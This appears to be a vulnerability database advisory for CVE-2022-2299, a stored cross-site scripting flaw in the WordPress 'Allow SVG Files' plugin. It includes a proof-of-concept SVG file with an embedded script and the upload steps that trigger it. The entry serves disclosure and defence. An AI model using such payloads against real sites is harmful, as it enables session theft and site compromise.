Allow SVG Files <= 1.1 – Author+ Stored Cross Site Scripting via SVG | CVE 2022-2299 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads

Proof of Concept

As an author or above, upload the below SVG file via the Media library:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert(/XSS/);
</script>
</svg>

The XSS will be triggered when accessing the file directly, e.g https://example.com/wp-content/uploads/2022/05/xss.svg

Affects Plugins

asf-allow-svg-files

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Luan Pedersini

Submitter

IBLISS Digital Security

Submitter website

https://ibliss.com.br

Verified

Yes

WPVDB ID

29015c35-0470-41b8-b197-c71b800ae2a9

Timeline

Publicly Published

2022-07-04 (about 1 years ago)

Added

2022-07-04 (about 1 years ago)

Last Updated

2023-04-07 (about 1 years ago)

Other

Published

Title

Published

2020-01-22

Title

Contact Form Clean and Simple < 4.7.1 - Authenticated Stored XSS

Published

2021-01-11

Title

Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)

Published

2022-06-14

Title

Gravity PDF < 6.3.1 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

smart-flv - jwplayer.swf XSS

Published

2024-04-08

Title

bunny.net – WordPress CDN Plugin < 2.0.2 - Authenticated (Administrator+) Stored Cross-Site Scripting